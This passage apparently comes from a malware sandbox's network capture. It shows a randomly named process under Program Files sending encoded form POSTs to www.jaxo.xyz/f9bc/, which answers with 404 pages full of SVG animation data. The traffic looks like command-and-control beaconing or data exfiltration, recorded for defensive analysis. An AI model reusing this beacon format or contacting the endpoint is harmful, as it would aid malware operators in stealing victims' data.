            Sep 2, 2024 09:09:07.039447069 CEST896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
            Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
            Sep 2, 2024 09:09:07.039562941 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
            Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
            Sep 2, 2024 09:09:07.039570093 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
            Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
            Sep 2, 2024 09:09:07.039611101 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
            Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
            Sep 2, 2024 09:09:07.039622068 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
            Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
            Sep 2, 2024 09:09:07.039633989 CEST224INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
            Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.43
            Sep 2, 2024 09:09:07.044466972 CEST1236INData Raw: 37 2d 2e 34 37 38 2d 2e 30 36 34 2d 31 2e 33 30 35 2d 2e 33 37 2d 31 2e 36 39 4d 31 31 37 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33
            Data Ascii: 7-.478-.064-1.305-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            18192.168.2.64974266.29.149.180802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:09.006517887 CEST767OUTPOST /f9bc/ HTTP/1.1
            Host: www.jaxo.xyz
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.jaxo.xyz
            Referer: http://www.jaxo.xyz/f9bc/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 43 74 71 58 43 4f 32 57 30 6f 70 42 4b 65 67 74 38 39 52 74 61 49 54 71 77 62 2b 61 77 33 73 35 75 6e 33 78 62 42 39 43 44 63 4b 67 3d 3d
            Data Ascii: cLqL3H=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwCtqXCO2W0opBKegt89RtaITqwb+aw3s5un3xbB9CDcKg==
            Sep 2, 2024 09:09:09.615267038 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:09:09 GMT
            Server: Apache
            Content-Length: 13840
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
            Sep 2, 2024 09:09:09.615287066 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
            Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
            Sep 2, 2024 09:09:09.615300894 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
            Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
            Sep 2, 2024 09:09:09.615403891 CEST1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
            Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
            Sep 2, 2024 09:09:09.615420103 CEST896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
            Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
            Sep 2, 2024 09:09:09.615689993 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
            Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
            Sep 2, 2024 09:09:09.615701914 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
            Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
            Sep 2, 2024 09:09:09.615771055 CEST1236INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
            Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
            Sep 2, 2024 09:09:09.615782976 CEST672INData Raw: 63 2d 2e 32 36 35 2d 31 2e 31 37 37 2d 31 2e 34 37 37 2d 32 2e 31 35 33 2d 32 2e 35 31 2d 31 2e 37 38 34 2d 2e 35 34 38 2e 31 39 35 2d 2e 36 35 33 20 31 2e 31 35 36 2d 2e 31 30 34 20 31 2e 34 34 32 2e 32 39 34 2e 31 35 33 2e 35 33 2e 33 39 37 2e
            Data Ascii: c-.265-1.177-1.477-2.153-2.51-1.784-.548.195-.653 1.156-.104 1.442.294.153.53.397.762.655.326.36.549.611.988.784.564.223.992-.535.864-1.097M100.988 4.781c.03-.437-.169-.702-.568-.724-.906-.33-1.89.849-2.3 1.608-.47.873.538 1.63 1.223 1.22.683-
            Sep 2, 2024 09:09:09.615796089 CEST1236INData Raw: 37 2d 2e 34 37 38 2d 2e 30 36 34 2d 31 2e 33 30 35 2d 2e 33 37 2d 31 2e 36 39 4d 31 31 37 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33
            Data Ascii: 7-.478-.064-1.305-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1
            Sep 2, 2024 09:09:09.620588064 CEST1236INData Raw: 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 6f 6c 68 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23
            Data Ascii: slate(161 68)"/> <g class="olhos"> <path fill="#633" d="M51.976 32.505c.27 2.748-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.97


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            19192.168.2.64974366.29.149.180802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:11.552978039 CEST1780OUTPOST /f9bc/ HTTP/1.1
            Host: www.jaxo.xyz
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.jaxo.xyz
            Referer: http://www.jaxo.xyz/f9bc/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 46 33 52 58 42 2b 63 70 58 79 71 31 67 70 61 6d 6a 57 5a 6d 65 55 67 52 38 65 61 55 76 67 76 2b 63 4a 47 6b 4b 65 53 70 30 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 64 68 50 72 70 61 42 43 54 6a 46 43 39 6e 48 45 62 47 6d 47 67 79 4c 45 34 43 7a 49 4a 4b 49 4d 79 74 38 6d 79 38 69 54 6e 7a 39 70 70 52 63 68 77 31 71 61 7a 67 68 79 66 4a 79 55 41 6f 53 71 46 78 4d 78 38 6e 37 49 46 4e 34 72 76 4a 74 4e 5a [TRUNCATED]
            Data Ascii: cLqL3H=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QF3RXB+cpXyq1gpamjWZmeUgR8eaUvgv+cJGkKeSp0Te/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcdhPrpaBCTjFC9nHEbGmGgyLE4CzIJKIMyt8my8iTnz9ppRchw1qazghyfJyUAoSqFxMx8n7IFN4rvJtNZdbuc4SWsjornsUdAfcSLJ5sA0WSJ3JZwmFWiq6+be35XV4ld12R3ubZHYMMD0/F6EB+2hW0Mhm4HN/Up43aR5+NFlNJULOYpWAGxZGp9IRFFEEmGCAJjCJ6MO22BGi9xii8q7M/+ENounBq+a2OaAOL3RgYRRvLlv9EzdE1O6bTbnIrMxpvTO6T7z8NnIAPucVxIKW5aX2YxVypA8yNXp9Wt8ilfGb1DBFUZN4PM/WZC+2rosto4Trs1c1Nn/u1C/fI78nY7iNY40A1W1CUuPMWyG1QIPtVwDMIxfWwi3tyXrYbDssWqCWBw41kbPL+KeY2Mc4Q9C8ap8FYMUdl7Wua5p06f6aUuYT8M1uHkAmzifsu++lbmcfMoGE4KFiKnujLaRvUShbkRugDxmdtUrolHnCCCc9IlHiNsTqe4PGoHrqglUNDf3V8fXZYcHtI50A/ox4X7VUZr6U9U12rmqIM0JeqIP9Iq+unTKLudZXIkEA89ZkqC3DCa44AaQ2Sq1pnhhYzhYPEVC3alPelxSXqOy04f9AAs3aMi4a3DgL/bpnY94ppBqfkgKD3Nv0ZRyOFaQSdi3d1sd01Hph4XAWca9y0fKh9gI1bc/NN5fxvrdVt9sTWaWctiOpr2AozjGj7P7RcEShF0V9jNtsCdXTP3U5VbzoDzJn [TRUNCATED]
            Sep 2, 2024 09:09:12.225414038 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:09:12 GMT
            Server: Apache
            Content-Length: 13840
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
            Sep 2, 2024 09:09:12.225485086 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
            Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
            Sep 2, 2024 09:09:12.225497961 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
            Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
            Sep 2, 2024 09:09:12.225644112 CEST672INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
            Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
            Sep 2, 2024 09:09:12.225661993 CEST1236INData Raw: 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30 36 2d 34 2e 38 35 32 20 31 36 2e 32 32 33 2d 39 2e 35 35 20 31 37 2e 39 39 38 2d 31 33 2e 32 39 38 20 31 2e 37 37 34 2d 33 2e 37 34 38 2d 31 30 37 2e 33 32 2d 37 2e 38 30 39 2d 31 32 34
            Data Ascii: 81 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima"> <path fill="#FBB868" d="M71.37 0C49.008.035-2.4
            Sep 2, 2024 09:09:12.225792885 CEST1236INData Raw: 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36 37 2e 31 39 2e 34 35 38 2e 36 39 34 2e 34 37 33 2e 37 33 37 2d 2e 32 35 2e 30 34 33 2d 2e 37 35 39 2d 2e 31 30 39 2d 31 2e 35 39 32 2d 2e 33 37 32 2d 32 2e 31 38 31 4d 33 32 2e 35 35 20
            Data Ascii: 87.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012
            Sep 2, 2024 09:09:12.225810051 CEST1236INData Raw: 31 2d 2e 34 34 31 2d 2e 35 39 31 4d 36 30 2e 35 38 39 20 39 2e 33 37 35 63 2d 2e 31 30 31 2d 2e 35 32 32 2d 2e 34 38 32 2d 2e 34 39 33 2d 2e 35 35 36 2e 30 34 38 2d 2e 31 32 2e 38 35 32 2e 31 30 32 20 31 2e 38 31 35 2e 34 32 33 20 32 2e 34 31 32
            Data Ascii: 1-.441-.591M60.589 9.375c-.101-.522-.482-.493-.556.048-.12.852.102 1.815.423 2.412.213.396.543.02.544-.494.002-.736-.283-1.302-.411-1.966M69.955 3.569c-.44-.473-1.713-.712-2.727-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1
            Sep 2, 2024 09:09:12.225822926 CEST672INData Raw: 2e 39 32 33 2e 32 37 37 2d 31 2e 33 33 38 4d 36 32 2e 39 30 36 20 35 2e 32 30 39 63 2d 2e 34 34 37 2d 2e 32 37 37 2d 31 2e 33 34 2d 2e 32 35 31 2d 31 2e 39 35 37 2d 2e 30 38 33 2d 2e 32 37 39 2e 30 37 37 2d 2e 35 37 2e 31 37 32 2d 2e 37 33 38 2e
